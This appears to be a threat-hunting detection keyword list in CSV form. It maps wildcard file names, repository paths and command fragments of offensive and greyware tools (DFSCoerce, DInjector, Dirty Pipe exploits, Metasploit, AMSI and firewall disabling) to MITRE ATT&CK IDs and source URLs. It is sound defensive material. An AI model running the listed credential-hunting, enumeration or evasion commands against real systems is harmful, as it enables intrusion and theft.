-*dfscoerce.py -d *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*dfscoerce.py*,offensive_tool_keyword,DFSCoerce,PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?,T1550.001 - T1078.003 - T1046,TA0002 - TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Wh04m1001/DFSCoerce,1,1,N/A,10,7,635,78,2022-09-09T17:45:41Z,2022-06-18T12:38:37Z
-*dfscoerce_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-*DFSCoerce-main*,offensive_tool_keyword,DFSCoerce,PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?,T1550.001 - T1078.003 - T1046,TA0002 - TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Wh04m1001/DFSCoerce,1,1,N/A,10,7,635,78,2022-09-09T17:45:41Z,2022-06-18T12:38:37Z
-*dGhlU2VtaW5vbGVzYmVhdG5vcmVkYW1l*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z
-*dGhlYnJvbmNvc2FyZWJldHRlcnRoYW5yYXZlbnM-*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z
-*dGhpc2lzYXRlc3RzdHJpbmdkb250Y2F0Y2htZQ--*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z
-*dhadilbmmjiooceioladdphemaliiobo*,greyware_tool_keyword,Free Proxy VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*dhcp6.spoof.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z
-*Dialupass.exe*,offensive_tool_keyword,dialupass,This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. You can use it to recover a lost password of your Internet connection or VPN.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/dialupass.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*Dialupass.zip*,offensive_tool_keyword,dialupass,This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. You can use it to recover a lost password of your Internet connection or VPN.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/dialupass.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*dicts*generic-usernames.txt*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information Gathering,https://www.spiderfoot.net/,1,0,N/A,6,10,N/A,N/A,N/A,N/A
-*dicts/ftp_pswd.txt*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z
-*dicts/ssh_default.txt*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z
-*dicts/ssh_pswd.txt*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z
-*diego-treitos/linux-smart-enumeration*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,1,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*dig * axfr *@*,greyware_tool_keyword,dig,dig,T1018,TA0007,N/A,N/A,Reconnaissance,https://linux.die.net/man/1/dig,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*dig *@* axfr*,greyware_tool_keyword,dig,classic DNS Zone transfer request. The idea behind it is to attempt to duplicate all the DNS records for a given zone (or domain). This is a technique often used by attackers to gather information about the infrastructure of a target organization.,T1018,TA0007,N/A,N/A,Reconnaissance,https://linux.die.net/man/1/dig,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*dig axfr * @*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*dinjector /i:* /p:*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*DInjector.csproj*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,1,private github repo,10,,N/A,,, -*DInjector.Detonator*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - 
T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,, -*DInjector.dll*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,1,private github repo,10,,N/A,,, -*DInjector/Dinjector*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,1,private github repo,10,,N/A,,, -*Dinjector-main*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,1,private github repo,10,,N/A,,, -*Dionach*PassHunt*,offensive_tool_keyword,PassHunt,PassHunt searches drives for documents that contain passwords or any other regular expression. Its designed to be a simple. standalone tool that can be run from a USB stick.,T1081 - T1083 - T1003 - T1039 - T1213,TA0003 - TA0010,N/A,N/A,Information Gathering,https://github.com/Dionach/PassHunt,1,1,N/A,N/A,1,60,36,2014-07-11T09:08:02Z,2014-07-11T08:46:20Z -*dir /a C:\pagefile.sys | findstr /R *,greyware_tool_keyword,find,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Discovery,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*dir C:\Users\*\AppData\Local\Microsoft\Credentials*,offensive_tool_keyword,dir,Find the IDs of protected secrets for a specific user,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*dir_create2system.txt*,offensive_tool_keyword,DirCreate2System,Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting,T1068 - T1059.001 - T1070.004,TA0003 - TA0002 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/binderlabs/DirCreate2System,1,1,N/A,8,4,332,38,2022-12-19T17:00:43Z,2022-12-15T03:49:55Z -*dirb *http* /usr/share/seclists/Discovery/Web-Content/big.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*dirb/wordlists*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*dircreate2system.cpp*,offensive_tool_keyword,DirCreate2System,Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting,T1068 - T1059.001 - T1070.004,TA0003 - TA0002 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/binderlabs/DirCreate2System,1,1,N/A,8,4,332,38,2022-12-19T17:00:43Z,2022-12-15T03:49:55Z -*dircreate2system.exe*,offensive_tool_keyword,DirCreate2System,Weaponizing to get NT SYSTEM for 
Privileged Directory Creation Bugs with Windows Error Reporting,T1068 - T1059.001 - T1070.004,TA0003 - TA0002 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/binderlabs/DirCreate2System,1,1,N/A,8,4,332,38,2022-12-19T17:00:43Z,2022-12-15T03:49:55Z -*dircreate2system.sln*,offensive_tool_keyword,DirCreate2System,Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting,T1068 - T1059.001 - T1070.004,TA0003 - TA0002 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/binderlabs/DirCreate2System,1,1,N/A,8,4,332,38,2022-12-19T17:00:43Z,2022-12-15T03:49:55Z -*dircreate2system.vcxproj*,offensive_tool_keyword,DirCreate2System,Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting,T1068 - T1059.001 - T1070.004,TA0003 - TA0002 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/binderlabs/DirCreate2System,1,1,N/A,8,4,332,38,2022-12-19T17:00:43Z,2022-12-15T03:49:55Z -*DirCreate2System-main*,offensive_tool_keyword,DirCreate2System,Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting,T1068 - T1059.001 - T1070.004,TA0003 - TA0002 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/binderlabs/DirCreate2System,1,1,N/A,8,4,332,38,2022-12-19T17:00:43Z,2022-12-15T03:49:55Z -*Direct_Syscalls_Create_Thread.c*,offensive_tool_keyword,Direct-Syscalls,Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. 
This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls,1,1,N/A,N/A,1,67,10,2023-05-24T04:23:37Z,2023-05-23T06:30:54Z -*Direct_Syscalls_Create_Thread.exe*,offensive_tool_keyword,Direct-Syscalls,Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls,1,1,N/A,N/A,1,67,10,2023-05-24T04:23:37Z,2023-05-23T06:30:54Z -*Direct_Syscalls_Create_Thread.sln*,offensive_tool_keyword,Direct-Syscalls,Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls,1,1,N/A,N/A,1,67,10,2023-05-24T04:23:37Z,2023-05-23T06:30:54Z -*Direct_Syscalls_Create_Thread.vcxproj*,offensive_tool_keyword,Direct-Syscalls,Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. 
This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls,1,1,N/A,N/A,1,67,10,2023-05-24T04:23:37Z,2023-05-23T06:30:54Z -*DirectDLL_x64.dll*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*DirectDLL_x86.dll*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Directory-Traversal-Payloads.*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z -*Direct-Syscalls-vs-Indirect-Syscalls.git*,offensive_tool_keyword,Indirect-Syscalls,Indirect syscalls serve as an evolution of 
direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls,1,1,N/A,N/A,1,67,10,2023-05-24T04:23:37Z,2023-05-23T06:30:54Z -*dirkjan@sanoweb.nl*,offensive_tool_keyword,ldapdomaindump,Active Directory information dumper via LDAP,T1087 - T1005 - T1016,TA0007,N/A,N/A,Credential Access,https://github.com/dirkjanm/ldapdomaindump,1,1,N/A,N/A,10,970,176,2023-09-06T05:50:30Z,2016-05-24T18:46:56Z -*dirkjanm/ldapdomaindump*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*dirkjanm/PKINITtools*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*dirkjanm/PrivExchange*,offensive_tool_keyword,privexchange,Exchange your privileges for Domain Admin privs by abusing Exchange,T1053.005 - T1078 - T1069.002,TA0002 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/dirkjanm/PrivExchange,1,1,N/A,N/A,10,905,170,2020-01-23T19:48:51Z,2019-01-21T17:39:47Z -*dirscanner.py*,offensive_tool_keyword,RedTeam_toolkit,Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together,T1550 
T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/signorrayan/RedTeam_toolkit,1,1,N/A,N/A,5,499,114,2023-09-27T04:40:54Z,2021-08-18T08:58:14Z -*dirscraper*,offensive_tool_keyword,dirscraper,Dirscraper is an OSINT scanning tool which assists penetration testers in identifying hidden. or previously unknown. directories on a domain or subdomain. This helps greatly in the recon stage of pentesting as it provide pentesters with a larger attack surface for the specific domain.,T1596 - T1530 - T1201,TA0040 - ,N/A,N/A,Information Gathering,https://github.com/Cillian-Collins/dirscraper,1,1,N/A,N/A,3,212,34,2019-02-24T12:22:47Z,2019-02-21T23:06:58Z -*dirsearch -r -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*dirsearch*,offensive_tool_keyword,dirsearch,Dirsearch is a mature command-line tool designed to brute force directories and files in webservers.,T1110 - T1114 - T1100 - T1313,TA0001 - TA0007,N/A,N/A,Web Attacks,https://github.com/maurosoria/dirsearch,1,0,N/A,N/A,10,10324,2209,2023-10-03T11:22:52Z,2013-04-30T15:57:40Z -*dirTraversal.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*dirTraversal-nix.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*dirTraversal-win.txt*,offensive_tool_keyword,wfuzz,Web 
application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*dirty_sock*,offensive_tool_keyword,POC,dirty_sock: Linux Privilege Escalation (via snapd) In January 2019. current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository contains the original exploit POC,T1210 - T1211 - T1212 - T1547,TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/initstring/dirty_sock,1,1,N/A,N/A,7,640,159,2019-05-09T21:34:26Z,2019-02-12T06:02:06Z -*dirty_sock/archive/master.zip*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*dirtycow*,offensive_tool_keyword,dirtycow,Linux vulnerability name to go root CVE-2016-5195) Dirty COW est une vulnrabilit de scurit du noyau Linux qui affecte tous les systmes d'exploitation Linux. y compris Android. 
C'est un dfaut d'lvation de privilge qui exploite une condition de concurrence dans la mise en uvre de la copie sur criture dans le noyau de gestion de la mmoire,T1068 - T1055 - T1574.002,TA0004 - TA0005 - TA0002,N/A,N/A,Exploitation tools,multiple pocs on github and others places ,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Dirty-Pipe/exploit-static*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/carlosevieira/Dirty-Pipe,1,1,N/A,N/A,1,8,5,2022-03-07T21:01:15Z,2022-03-07T20:57:34Z -*dirtypipe-exploit/blob/main/dirtypipe.c*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/rahul1406/cve-2022-0847dirtypipe-exploit,1,1,N/A,N/A,,N/A,,, -*-DirtyPipe-Exploits*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits,1,1,N/A,N/A,5,453,129,2023-05-20T05:55:45Z,2022-03-12T20:57:24Z -*dirwalk.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*disable_clamav.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*disable_clamav.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Disable_Privilege /Process:* /Privilege:*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*DisableAllWindowsSoftwareFirewalls*,offensive_tool_keyword,cobaltstrike,A BOF to interact with COM objects associated with the Windows software firewall.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Firewall_Walker_BOF,1,1,N/A,10,10,98,13,2021-10-10T03:28:27Z,2021-10-09T05:17:10Z 
-*DisableAMSI(*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*DisableAntiPhishing*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*DisableAntiPhishing.ps1*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
